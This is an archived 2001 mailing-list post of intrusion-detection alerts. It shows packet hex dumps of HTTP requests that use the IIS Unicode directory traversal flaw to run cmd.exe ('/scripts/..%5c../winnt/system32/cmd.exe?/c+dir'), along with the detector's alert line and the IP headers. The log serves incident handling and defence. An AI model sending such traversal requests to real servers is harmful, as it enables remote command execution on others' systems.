2E 2E 25 GET /scripts/..% 010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste 020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d 030 : 69 72 20 63 2B 64 69 72 20 48 54 54 50 2F 31 2E ir c+dir HTTP/1. 040 : 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 0..Host: www..Co 050 : 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F nnnection: clo ---------------------------------------------------------------------------- -- #(2 - 23457) [2001-09-18 09:01:46] spp_unidecode: Unicode Directory Transversal attack detected IPv4: 65.29.45.70 -> 65.29.59.66 hlen=5 TOS=0 dlen=136 ID=7250 flags=0 offset=0 TTL=123 chksum=63579 TCP: port=3214 -> dport: 80 flags=***AP*** seq=1772999286 ack=741934650 off=5 res=0 win=65535 urp=0 chksum=944 Payload: length = 94 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 32 66 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 2f../winnt/syste 020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d 030 : 69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 ir r HTTP/1.0..H 040 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: www..Connne 050 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A ction: close.. ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 09:49:46 PDT